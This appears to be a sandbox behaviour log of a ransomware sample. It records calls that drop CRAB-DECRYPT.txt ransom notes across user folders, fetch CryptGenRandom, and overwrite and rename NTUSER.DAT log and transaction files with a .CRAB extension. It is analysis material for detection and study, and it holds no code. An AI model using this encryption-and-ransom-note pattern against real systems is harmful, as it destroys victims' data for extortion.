| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Roaming\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Cookies\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Desktop\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Documents\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Documents\My Music\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Documents\My Pictures\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Documents\My Videos\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Downloads\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Favorites\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Links\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\My Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\My Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\My Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NetHood\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1, size = 1048576, size_out = 49152 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1, size = 49152 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1, destination_filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG1.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2, size = 1048576, size_out = 20480 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2, size = 20480 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2, destination_filename = C:\Documents and Settings\Default\NTUSER.DAT.LOG2.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, size = 1048576, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, size = 65536 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, destination_filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, size = 1048576, size_out = 524288 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, size = 524288 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, destination_filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, size = 1048576, size_out = 524288 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, size = 524288 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, destination_filename = C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\PrintHood\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Recent\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\Saved Games\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
